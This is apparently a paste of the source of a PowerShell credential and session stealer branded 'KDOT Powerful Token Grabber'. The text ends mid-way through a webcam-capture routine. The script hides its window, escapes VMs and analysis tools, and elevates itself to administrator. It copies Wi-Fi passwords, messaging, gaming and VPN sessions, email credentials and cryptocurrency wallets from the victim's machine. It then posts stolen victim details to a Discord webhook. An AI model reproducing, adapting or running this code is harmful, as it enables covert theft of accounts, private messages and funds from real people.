ewfijooewfj
🧩 Syntax:
# Single Instance (no overloads)
function Compare-Mutex {
$AppId = "16fcb8bb-e281-472d-a9f6-39f0f32f19f2" # This GUID string is changeable
$CreatedNew = $false
$script:SingleInstanceEvent = New-Object Threading.EventWaitHandle $true, ([Threading.EventResetMode]::ManualReset), "Global\$AppID", ([ref] $CreatedNew)
if( -not $CreatedNew ) {
throw "An instance of this script is already running."
} else {
Invoke-ANTITOTAL
}
}
Add-Type -AssemblyName PresentationCore,PresentationFramework
$webhook = "YOUR_WEBHOOK_HERE"
$debug_mode = $false
$udc_mode = $true
if (!($debug_mode)) {
$ErrorActionPreference = 'SilentlyContinue'
$ProgressPreference = 'SilentlyContinue'
}
function Invoke-Admin_Check {
$test = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
return $test
}
function Hide-Console
{
if (-not ("Console.Window" -as [type])) {
Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);
'
}
$consolePtr = [Console.Window]::GetConsoleWindow()
$null = [Console.Window]::ShowWindow($consolePtr, 0)
}
function make_error_page {
param(
[Parameter(Mandatory=$true)]
[string]$error_message
)
$null = [System.Windows.MessageBox]::Show("$error_message","ERROR",0,16)
}
function Search-Mac ($mac_addresses) {
$pc_mac = (Get-WmiObject win32_networkadapterconfiguration -ComputerName $env:COMPUTERNAME | Where-Object{$_.IpEnabled -Match "True"} | Select-Object -Expand macaddress) -join ","
ForEach ($mac123 in $mac_addresses) {
if ($pc_mac -contains $mac123) {
return $true
}
}
return $false
}
function Search-IP ($ip_addresses) {
$pc_ip = Invoke-WebRequest -Uri "https://api.ipify.org" -UseBasicParsing
$pc_ip = $pc_ip.Content
ForEach ($ip123 in $ip_addresses) {
if ($pc_ip -contains $ip123) {
return $true
}
}
return $false
}
function Search-HWID ($hwids) {
$pc_hwid = Get-WmiObject -Class Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
ForEach ($hwid123 in $hwids) {
if ($pc_hwid -contains $hwid123) {
return $true
}
}
return $false
}
function Search-Username ($usernames) {
$pc_username = $env:USERNAME
ForEach ($username123 in $usernames) {
if ($pc_username -contains $username123) {
return $true
}
}
return $false
}
function ram_check {
$ram = Get-WmiObject -Class Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | ForEach-Object {[Math]::Round(($_.Sum / 1GB),2)}
if ($ram -lt 6) {
make_error_page "RAM CHECK FAILED"
Start-Sleep -s 3
exit
}
}
function Invoke-ANTIVM {
ram_check
$processnames= @(
"autoruns",
"autorunsc",
"dumpcap",
"fiddler",
"fakenet",
"hookexplorer",
"immunitydebugger",
"httpdebugger",
"importrec",
"lordpe",
"petools",
"processhacker",
"resourcehacker",
"scylla_x64",
"sandman",
"sysinspector",
"tcpview",
"die",
"dumpcap",
"filemon",
"idaq",
"idaq64",
"joeboxcontrol",
"joeboxserver",
"ollydbg",
"proc_analyzer",
"procexp",
"procmon",
"pestudio",
"qemu-ga",
"qga",
"regmon",
"sniff_hit",
"sysanalyzer",
"tcpview",
"windbg",
"wireshark",
"x32dbg",
"x64dbg",
"vmwareuser",
"vmacthlp",
"vboxservice",
"vboxtray",
"xenservice"
)
$detectedProcesses = $processnames | ForEach-Object {
$processName = $_
if (Get-Process -Name $processName -Erroraction SilentlyContinue) {
$processName
}
}
if ($null -eq $detectedProcesses) {
Invoke-TASKS
}
else {
Write-Output "Detected processes: $($detectedProcesses -join ', ')"
Remove-Item $PSCommandPath -Force
}
}
function Invoke-ANTITOTAL {
$urls = @(
"https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/mac_list.txt",
"https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt",
"https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/hwid_list.txt",
"https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt"
)
$functions = @(
"Search-Mac",
"Search-IP",
"Search-HWID",
"Search-Username"
)
for ($i = 0; $i -lt $urls.Count; $i++) {
$url = $urls[$i]
$functionName = $functions[$i]
$result = Invoke-WebRequest -Uri $url -UseBasicParsing
if ($result.StatusCode -eq 200) {
$content = $result.Content
$function = Get-Command -Name $functionName
$output = & $function.Name $content
if ($output -eq $true) {
make_error_page "Detected VM"
Start-Sleep -s 3
exit
}
}
else {
""
}
}
Invoke-ANTIVM
}
function Request-Admin {
while(!(Invoke-Admin_Check)) {
try {
if ($debug_mode) {
Start-Process "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs
} else {
Start-Process "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle hidden -File `"$PSCommandPath`"" -Verb RunAs
}
exit
}
catch {}
}
}
function Backup-Data {
$folder_general = "$env:APPDATA\KDOT\DATA"
$folder_messaging = "$env:APPDATA\KDOT\DATA\Messaging Sessions"
$folder_gaming = "$env:APPDATA\KDOT\DATA\Gaming Sessions"
$folder_crypto = "$env:APPDATA\KDOT\DATA\Crypto Wallets"
$folder_vpn = "$env:APPDATA\KDOT\DATA\VPN Clients"
$folder_email = "$env:APPDATA\KDOT\DATA\Email Clients"
$important_files = "$env:APPDATA\KDOT\DATA\Important Files"
$browser_data = "$env:APPDATA\KDOT\DATA\Browser Data"
New-Item -ItemType Directory -Path $folder_general -Force
New-Item -ItemType Directory -Path $folder_messaging -Force
New-Item -ItemType Directory -Path $folder_gaming -Force
New-Item -ItemType Directory -Path $folder_crypto -Force
New-Item -ItemType Directory -Path $folder_vpn -Force
New-Item -ItemType Directory -Path $browser_data -Force
New-Item -ItemType Directory -Path $folder_email -Force
New-Item -ItemType Directory -Path $important_files -Force
#bulk data
$ip = Invoke-WebRequest -Uri "https://api.ipify.org" -UseBasicParsing
$ip = $ip.Content
$ip > $folder_general\ip.txt
$lang = (Get-WinUserLanguageList).LocalizedName
$date = (get-date).toString("r")
Get-ComputerInfo > $folder_general\system_info.txt
$osversion = (Get-WmiObject -class Win32_OperatingSystem).Caption
$osbuild = (Get-ItemProperty -Path c:\windows\system32\hal.dll).VersionInfo.FileVersion
$displayversion = (Get-Item "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion").GetValue('DisplayVersion')
$model = (Get-WmiObject -Class:Win32_ComputerSystem).Model
$uuid = Get-WmiObject -Class Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
$uuid > $folder_general\uuid.txt
$cpu = Get-WmiObject -Class Win32_Processor | Select-Object -ExpandProperty Name
$cpu > $folder_general\cpu.txt
$gpu = (Get-WmiObject Win32_VideoController).Name
$gpu > $folder_general\GPU.txt
$format = " GB"
$total = Get-CimInstance Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | ForEach-Object {"{0:N2}" -f ([math]::round(($_.Sum / 1GB),2))}
$raminfo = "$total" + "$format"
$mac = (Get-WmiObject win32_networkadapterconfiguration -ComputerName $env:COMPUTERNAME | Where-Object{$_.IpEnabled -Match "True"} | Select-Object -Expand macaddress) -join ","
$mac > $folder_general\mac.txt
$username = $env:USERNAME
$hostname = $env:COMPUTERNAME
netstat -ano > $folder_general\netstat.txt
$mfg = (Get-WmiObject win32_computersystem).Manufacturer
#end of bulk data
function Get-Uptime {
$ts = (Get-Date) - (Get-CimInstance -ClassName Win32_OperatingSystem -ComputerName $computername).LastBootUpTime
$uptimedata = '{0} days {1} hours {2} minutes {3} seconds' -f $ts.Days, $ts.Hours, $ts.Minutes, $ts.Seconds
$uptimedata
}
$uptime = Get-Uptime
function get-installed-av {
$wmiQuery = "SELECT * FROM AntiVirusProduct"
$AntivirusProduct = Get-WmiObject -Namespace "root\SecurityCenter2" -Query $wmiQuery @psboundparameters
$AntivirusProduct.displayName
}
$avlist = get-installed-av -autosize | Format-Table | out-string
$wifipasslist = netsh wlan show profiles | Select-String "\:(.+)$" | ForEach-Object{ $_ } | ForEach-Object{(netsh wlan show profile name="$($_.Matches.Groups[1].Value.Trim())" key=clear)} | Select-String "Key Content\W+\:(.+)$" | ForEach-Object{$_.Matches.Groups[1].Value.Trim()} | ForEach-Object{[PSCustomObject]@{ PROFILE_NAME=$($_.Matches.Groups[1].Value.Trim());PASSWORD=$_ }} | Out-String
$wifi = $wifipasslist | out-string
$wifi > $folder_general\WIFIPasswords.txt
$width = (((Get-WmiObject -Class Win32_VideoController).VideoModeDescription -split '\n')[0] -split ' ')[0]
$height = (((Get-WmiObject -Class Win32_VideoController).VideoModeDescription -split '\n')[0] -split ' ')[2]
$split = "x"
$screen = "$width" + "$split" + "$height"
#misc data
Get-CimInstance Win32_StartupCommand | Select-Object Name, command, Location, User | Format-List > $folder_general\StartUpApps.txt
Get-WmiObject win32_service |Where-Object State -match "running" | Select-Object Name, DisplayName, PathName, User | Sort-Object Name | Format-Table -wrap -autosize > $folder_general\running-services.txt
Get-WmiObject win32_process | Select-Object Name,Description,ProcessId,ThreadCount,Handles,Path | Format-Table -wrap -autosize > $folder_general\running-applications.txt
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table > $folder_general\Installed-Applications.txt
Get-NetAdapter | Format-Table Name,InterfaceDescription,PhysicalMediaType,NdisPhysicalMedium -AutoSize > $folder_general\NetworkAdapters.txt
function diskdata {
$disks = get-wmiobject -class "Win32_LogicalDisk" -namespace "root\CIMV2"
$results = foreach ($disk in $disks) {
if ($disk.Size -gt 0) {
$SizeOfDisk = [math]::round($disk.Size/1GB, 0)
$FreeSpace = [math]::round($disk.FreeSpace/1GB, 0)
$usedspace = [math]::round(($disk.size - $disk.freespace) / 1GB, 2)
[int]$FreePercent = ($FreeSpace/$SizeOfDisk) * 100
[int]$usedpercent = ($usedspace/$SizeOfDisk) * 100
[PSCustomObject]@{
Drive = $disk.Name
Name = $disk.VolumeName
"Total Disk Size" = "{0:N0} GB" -f $SizeOfDisk
"Free Disk Size" = "{0:N0} GB ({1:N0} %)" -f $FreeSpace, ($FreePercent)
"Used Space" = "{0:N0} GB ({1:N0} %)" -f $usedspace, ($usedpercent)
}
}
}
$results
}
$alldiskinfo = diskdata | out-string
$alldiskinfo > $folder_general\diskinfo.txt
function Get-ProductKey {
try {
$regPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform'
$keyName = 'BackupProductKeyDefault'
$backupProductKey = Get-ItemPropertyValue -Path $regPath -Name $keyName
return $backupProductKey
} catch {
return "No product key found"
}
}
Get-ProductKey > $folder_general\productkey.txt
# All Messaging Sessions
function telegramstealer {
$processname = "telegram"
$pathtele = "$env:userprofile\AppData\Roaming\Telegram Desktop\tdata"
if (!(Test-Path $pathtele)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname -ErrorAction SilentlyContinue | Stop-Process }} catch {}
$destination = "$folder_messaging\Telegram.zip"
$exclude = @("_*.config","dumps","tdummy","emoji","user_data","user_data#2","user_data#3","user_data#4","user_data#5","user_data#6","*.json","webview")
$files = Get-ChildItem -Path $pathtele -Exclude $exclude
Compress-Archive -Path $files -DestinationPath $destination -CompressionLevel Fastest -Force
}
# Element Session Stealer
function elementstealer {
$processname = "element"
$elementfolder = "$env:userprofile\AppData\Roaming\Element"
if (!(Test-Path $elementfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname -ErrorAction SilentlyContinue | Stop-Process }} catch {}
$element_session = "$folder_messaging\Element"
New-Item -ItemType Directory -Force -Path $element_session
Copy-Item -Path "$elementfolder\databases" -Destination $element_session -Recurse -force -ErrorAction SilentlyContinue
Copy-Item -Path "$elementfolder\Local Storage" -Destination $element_session -Recurse -force -ErrorAction SilentlyContinue
Copy-Item -Path "$elementfolder\Session Storage" -Destination $element_session -Recurse -force -ErrorAction SilentlyContinue
Copy-Item -Path "$elementfolder\IndexedDB" -Destination $element_session -Recurse -force -ErrorAction SilentlyContinue
Copy-Item -Path "$elementfolder\sso-sessions.json" -Destination $element_session -Recurse -force -ErrorAction SilentlyContinue
}
# ICQ Session Stealer
function icqstealer {
$processname = "icq"
$icqfolder = "$env:userprofile\AppData\Roaming\ICQ"
if (!(Test-Path $icqfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname -ErrorAction SilentlyContinue | Stop-Process }} catch {}
$icq_session = "$folder_messaging\ICQ"
New-Item -ItemType Directory -Force -Path $icq_session -ErrorAction SilentlyContinue
Copy-Item -Path "$icqfolder\0001" -Destination $icq_session -Recurse -force -ErrorAction SilentlyContinue
}
# Signal Session Stealer
function signalstealer {
$processname = "signal"
$signalfolder = "$env:userprofile\AppData\Roaming\Signal"
if (!(Test-Path $signalfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$signal_session = "$folder_messaging\Signal"
New-Item -ItemType Directory -Force -Path $signal_session
Copy-Item -Path "$signalfolder\databases" -Destination $signal_session -Recurse -force
Copy-Item -Path "$signalfolder\Local Storage" -Destination $signal_session -Recurse -force
Copy-Item -Path "$signalfolder\Session Storage" -Destination $signal_session -Recurse -force
Copy-Item -Path "$signalfolder\sql" -Destination $signal_session -Recurse -force
Copy-Item -Path "$signalfolder\config.json" -Destination $signal_session -Recurse -force
}
# Viber Session Stealer
function viberstealer {
$processname = "viber"
$viberfolder = "$env:userprofile\AppData\Roaming\ViberPC"
if (!(Test-Path $viberfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$viber_session = "$folder_messaging\Viber"
New-Item -ItemType Directory -Force -Path $viber_session
$configfiles = @("config$1")
foreach($file in $configfiles) {
Get-ChildItem -path $viberfolder -Filter ([regex]::escape($file) + "*") -Recurse -File | ForEach-Object { Copy-Item -path $PSItem.FullName -Destination $viber_session }
}
$pattern = "^([\+|0-9 ][ 0-9.]{1,12})$"
$directories = Get-ChildItem -Path $viberFolder -Directory | Where-Object { $_.Name -match $pattern }
foreach ($directory in $directories) {
$destinationPath = Join-Path -Path $viber_session -ChildPath $directory.Name
Copy-Item -Path $directory.FullName -Destination $destinationPath -Force
}
$files = Get-ChildItem -Path $viberFolder -File -Recurse -Include "*.db", "*.db-shm", "*.db-wal" | Where-Object { -not $_.PSIsContainer }
foreach ($file in $files) {
$parentFolder = Split-Path -Path $file.FullName -Parent
$phoneNumberFolder = Get-ChildItem -Path $parentFolder -Directory | Where-Object { $_.Name -match $pattern}
if (-not $phoneNumberFolder) {
Copy-Item -Path $file.FullName -Destination $destinationPath
}
}
}
# Whatsapp Session Stealer
function whatsappstealer {
$processname = "whatsapp"
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$whatsapp_session = "$folder_messaging\Whatsapp"
New-Item -ItemType Directory -Force -Path $whatsapp_session
$regexPattern = "WhatsAppDesktop"
$parentFolder = Get-ChildItem -Path "$env:localappdata\Packages" -Directory | Where-Object { $_.Name -match $regexPattern }
if ($parentFolder){
$localStateFolder = Get-ChildItem -Path $parentFolder.FullName -Filter "LocalState" -Recurse -Directory
if ($localStateFolder) {
$destinationPath = Join-Path -Path $whatsapp_session -ChildPath $localStateFolder.Name
Copy-Item -Path $localStateFolder.FullName -Destination $destinationPath -Recurse
}
}
}
# All Gaming Sessions
# Steam Session Stealer
function steamstealer {
$processname = "steam"
$steamfolder = ("${Env:ProgramFiles(x86)}\Steam")
if (!(Test-Path $steamfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$steam_session = "$folder_gaming\Steam"
New-Item -ItemType Directory -Force -Path $steam_session
Copy-Item -Path "$steamfolder\config" -Destination $steam_session -Recurse -force
$ssfnfiles = @("ssfn$1")
foreach($file in $ssfnfiles) {
Get-ChildItem -path $steamfolder -Filter ([regex]::escape($file) + "*") -Recurse -File | ForEach-Object { Copy-Item -path $PSItem.FullName -Destination $steam_session }
}
}
# Minecraft Session Stealer
function minecraftstealer {
$minecraft_session = "$folder_gaming\Minecraft"
if (!(Test-Path $minecraft_session)) {return}
New-Item -ItemType Directory -Force -Path $minecraft_session
$minecraftfolder1 = $env:appdata + "\.minecraft"
$minecraftfolder2 = $env:userprofile + "\.lunarclient\settings\game"
Get-ChildItem $minecraftfolder1 -Include "*.json" -Recurse | Copy-Item -Destination $minecraft_session -ErrorAction SilentlyContinue
Get-ChildItem $minecraftfolder2 -Include "*.json" -Recurse | Copy-Item -Destination $minecraft_session -ErrorAction SilentlyContinue
}
# Epicgames Session Stealer
function epicgames_stealer {
$processname = "epicgameslauncher"
$epicgamesfolder = "$env:localappdata\EpicGamesLauncher"
if (!(Test-Path $epicgamesfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$epicgames_session = "$folder_gaming\EpicGames"
New-Item -ItemType Directory -Force -Path $epicgames_session
Copy-Item -Path "$epicgamesfolder\Saved\Config" -Destination $epicgames_session -Recurse -force
Copy-Item -Path "$epicgamesfolder\Saved\Logs" -Destination $epicgames_session -Recurse -force
Copy-Item -Path "$epicgamesfolder\Saved\Data" -Destination $epicgames_session -Recurse -force
}
# Ubisoft Session Stealer
function ubisoftstealer {
$processname = "upc"
$ubisoftfolder = "$env:localappdata\Ubisoft Game Launcher"
if (!(Test-Path $ubisoftfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$ubisoft_session = "$folder_gaming\Ubisoft"
New-Item -ItemType Directory -Force -Path $ubisoft_session
Copy-Item -Path "$ubisoftfolder" -Destination $ubisoft_session -Recurse -force
}
# EA Session Stealer
function electronic_arts {
$processname = "eadesktop"
$eafolder = "$env:localappdata\Electronic Arts"
if (!(Test-Path $eafolder)) {return}
$ea_session = "$folder_gaming\Electronic Arts"
if (!(Test-Path $ea_session)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
New-Item -ItemType Directory -Force -Path $ea_session
Copy-Item -Path "$eafolder" -Destination $ea_session -Recurse -force
}
# Growtopia Stealer
function growtopiastealer {
$processname = "growtopia"
$growtopiafolder = "$env:localappdata\Growtopia"
if (!(Test-Path $growtopiafolder)) {return}
$growtopia_session = "$folder_gaming\Growtopia"
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
New-Item -ItemType Directory -Force -Path $growtopia_session
Copy-Item -Path "$growtopiafolder\save.dat" -Destination $growtopia_session -Recurse -force
}
# All VPN Sessions
# NordVPN
function nordvpnstealer {
$processname = "nordvpn"
$nordvpnfolder = "$env:localappdata\nordvpn"
if (!(Test-Path $nordvpnfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$nordvpn_account = "$folder_vpn\NordVPN"
New-Item -ItemType Directory -Force -Path $nordvpn_account
$pattern = "^([A-Za-z]+\.exe_Path_[A-Za-z0-9]+)$"
$directories = Get-ChildItem -Path $nordvpnfolder -Directory | Where-Object { $_.Name -match $pattern }
$files = Get-ChildItem -Path $nordvpnfolder -File | Where-Object { $_.Name -match $pattern }
foreach ($directory in $directories) {
$destinationPath = Join-Path -Path $nordvpn_account -ChildPath $directory.Name
Copy-Item -Path $directory.FullName -Destination $destinationPath -Recurse -Force
}
foreach ($file in $files) {
$destinationPath = Join-Path -Path $nordvpn_account -ChildPath $file.Name
Copy-Item -Path $file.FullName -Destination $destinationPath -Force
}
Copy-Item -Path "$nordvpnfolder\ProfileOptimization" -Destination $nordvpn_account -Recurse -force
Copy-Item -Path "$nordvpnfolder\libmoose.db" -Destination $nordvpn_account -Recurse -force
}
# ProtonVPN
function protonvpnstealer {
$processname = "protonvpn"
$protonvpnfolder = "$env:localappdata\protonvpn"
if (!(Test-Path $protonvpnfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$protonvpn_account = "$folder_vpn\ProtonVPN"
New-Item -ItemType Directory -Force -Path $protonvpn_account
$pattern = "^(ProtonVPN_Url_[A-Za-z0-9]+)$"
$directories = Get-ChildItem -Path $protonvpnfolder -Directory | Where-Object { $_.Name -match $pattern }
$files = Get-ChildItem -Path $protonvpnfolder -File | Where-Object { $_.Name -match $pattern }
foreach ($directory in $directories) {
$destinationPath = Join-Path -Path $protonvpn_account -ChildPath $directory.Name
Copy-Item -Path $directory.FullName -Destination $destinationPath -Recurse -Force
}
foreach ($file in $files) {
$destinationPath = Join-Path -Path $protonvpn_account -ChildPath $file.Name
Copy-Item -Path $file.FullName -Destination $destinationPath -Force
}
Copy-Item -Path "$protonvpnfolder\Startup.profile" -Destination $protonvpn_account -Recurse -force
}
#Surfshark VPN
function surfsharkvpnstealer {
$processname = "Surfshark"
$surfsharkvpnfolder = "$env:appdata\Surfshark"
if (!(Test-Path $surfsharkvpnfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$surfsharkvpn_account = "$folder_vpn\Surfshark"
New-Item -ItemType Directory -Force -Path $surfsharkvpn_account
Get-ChildItem $surfsharkvpnfolder -Include @("data.dat", "settings.dat", "settings-log.dat", "private_settings.dat") -Recurse | Copy-Item -Destination $surfsharkvpn_account
}
function Export-Data_Sessions {
telegramstealer
elementstealer
icqstealer
signalstealer
viberstealer
whatsappstealer
steamstealer
minecraftstealer
epicgames_stealer
ubisoftstealer
electronic_arts
growtopiastealer
nordvpnstealer
protonvpnstealer
surfsharkvpnstealer
}
Export-Data_Sessions
# Thunderbird Exfil
If (Test-Path -Path "$env:USERPROFILE\AppData\Roaming\Thunderbird\Profiles") {
$Thunderbird = @('key4.db', 'key3.db', 'logins.json', 'cert9.db')
New-Item -Path "$folder_email\Thunderbird" -ItemType Directory | Out-Null
Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Thunderbird\Profiles" -Include $Thunderbird -Recurse | Copy-Item -Destination "$folder_email\Thunderbird" -Recurse -Force
}
function Invoke-Crypto_Wallets {
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Armory") {
New-Item -Path "$folder_crypto\Armory" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\Armory" -Recurse | Copy-Item -Destination "$folder_crypto\Armory" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Atomic") {
New-Item -Path "$folder_crypto\Atomic" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\Atomic\Local Storage\leveldb" -Recurse | Copy-Item -Destination "$folder_crypto\Atomic" -Recurse -Force
}
If (Test-Path -Path "Registry::HKEY_CURRENT_USER\software\Bitcoin") {
New-Item -Path "$folder_crypto\BitcoinCore" -ItemType Directory | Out-Null
Get-ChildItem (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\software\Bitcoin\Bitcoin-Qt" -Name strDataDir).strDataDir -Include *wallet.dat -Recurse | Copy-Item -Destination "$folder_crypto\BitcoinCore" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\bytecoin") {
New-Item -Path "$folder_crypto\bytecoin" -ItemType Directory | Out-Null
Get-ChildItem ("$env:userprofile\AppData\Roaming\bytecoin", "$env:userprofile") -Include *.wallet -Recurse | Copy-Item -Destination "$folder_crypto\bytecoin" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Local\Coinomi") {
New-Item -Path "$folder_crypto\Coinomi" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Local\Coinomi\Coinomi\wallets" -Recurse | Copy-Item -Destination "$folder_crypto\Coinomi" -Recurse -Force
}
If (Test-Path -Path "Registry::HKEY_CURRENT_USER\software\Dash") {
New-Item -Path "$folder_crypto\DashCore" -ItemType Directory | Out-Null
Get-ChildItem (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\software\Dash\Dash-Qt" -Name strDataDir).strDataDir -Include *wallet.dat -Recurse | Copy-Item -Destination "$folder_crypto\DashCore" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Electrum") {
New-Item -Path "$folder_crypto\Electrum" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\Electrum\wallets" -Recurse | Copy-Item -Destination "$folder_crypto\Electrum" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Ethereum") {
New-Item -Path "$folder_crypto\Ethereum" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\Ethereum\keystore" -Recurse | Copy-Item -Destination "$folder_crypto\Ethereum" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Exodus") {
New-Item -Path "$folder_crypto\exodus.wallet" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\exodus.wallet" -Recurse | Copy-Item -Destination "$folder_crypto\exodus.wallet" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Guarda") {
New-Item -Path "$folder_crypto\Guarda" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\Guarda\IndexedDB" -Recurse | Copy-Item -Destination "$folder_crypto\Guarda" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\com.liberty.jaxx") {
New-Item -Path "$folder_crypto\liberty.jaxx" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb" -Recurse | Copy-Item -Destination "$folder_crypto\liberty.jaxx" -Recurse -Force
}
If (Test-Path -Path "Registry::HKEY_CURRENT_USER\software\Litecoin") {
New-Item -Path "$folder_crypto\Litecoin" -ItemType Directory | Out-Null
Get-ChildItem (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\software\Litecoin\Litecoin-Qt" -Name strDataDir).strDataDir -Include *wallet.dat -Recurse | Copy-Item -Destination "$folder_crypto\Litecoin" -Recurse -Force
}
If (Test-Path -Path "Registry::HKEY_CURRENT_USER\software\monero-project") {
New-Item -Path "$folder_crypto\Monero" -ItemType Directory | Out-Null
Get-ChildItem (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\software\monero-project\monero-core" -Name wallet_path).wallet_path -Recurse | Copy-Item -Destination "$folder_crypto\Monero" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Zcash") {
New-Item -Path "$folder_crypto\Zcash" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\Zcash" -Recurse | Copy-Item -Destination "$folder_crypto\Zcash" -Recurse -Force
}
}
Invoke-Crypto_Wallets
$embed_and_body = @{
"username" = "KDOT"
"content" = "@everyone"
"title" = "KDOT"
"description" = "Powerful Token Grabber"
"color" = "3447003"
"avatar_url" = "https://i.postimg.cc/k58gQ03t/PTG.gif"
"url" = "https://discord.gg/vk3rBhcj2y"
"embeds" = @(
@{
"title" = "POWERSHELL GRABBER"
"url" = "https://github.com/ChildrenOfYahweh/Powershell-Token-Grabber/tree/main"
"description" = "New victim info collected !"
"color" = "3447003"
"footer" = @{
"text" = "Made by KDOT, GODFATHER and CHAINSKI"
}
"thumbnail" = @{
"url" = "https://i.postimg.cc/k58gQ03t/PTG.gif"
}
"fields" = @(
@{
"name" = ":satellite: IP"
"value" = "``````$ip``````"
},
@{
"name" = ":bust_in_silhouette: User Information"
"value" = "``````Date: $date `nLanguage: $lang `nUsername: $username `nHostname: $hostname``````"
},
@{
"name" = ":shield: Antivirus"
"value" = "``````$avlist``````"
},
@{
"name" = ":computer: Hardware"
"value" = "``````Screen Size: $screen `nOS: $osversion `nOS Build: $osbuild `nOS Version: $displayversion `nManufacturer: $mfg `nModel: $model `nCPU: $cpu `nGPU: $gpu `nRAM: $raminfo `nHWID: $uuid `nMAC: $mac `nUptime: $uptime``````"
},
@{
"name" = ":floppy_disk: Disk"
"value" = "``````$alldiskinfo``````"
}
@{
"name" = ":signal_strength: WiFi"
"value" = "``````$wifi``````"
}
)
}
)
}
$payload = $embed_and_body | ConvertTo-Json -Depth 10
Invoke-WebRequest -Uri $webhook -Method POST -Body $payload -ContentType "application/json" -UseBasicParsing | Out-Null
function Get-WebCamImage {
# made by https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1
$source=@"
using System;
using System.Collections.Generic;
using System.Text;
using System.Collections;
using System.Runtime.InteropServices;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Windows.Forms;
namespace WebCamLib
{
public class Device
{
private const short WM_CAP = 0x400;
private const int WM_CAP_DRIVER_CONNECT = 0x40a;
private const int WM_CAP_DRIVER_DISCONNECT = 0x40b;
private const int WM_CAP_EDIT_COPY = 0x41e;
private const int WM_CAP_SET_PREVIEW = 0x432;
private const int WM_CAP_SET_OVERLAY = 0x433;
private const int WM_CAP_SET_PREVIEWRATE = 0x434;
private const int WM_CAP_SET_SCALE = 0x435;
private const int WS_CHILD = 0x40000000;
private const int WS_VISIBLE = 0x10000000;
[DllImport("avicap32.dll")]
protected static extern int capCreateCaptureWindowA([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszWindowName,
int dwStyle, int x, int y, int nWidth, int nHeight, int hWndParent, int nID);
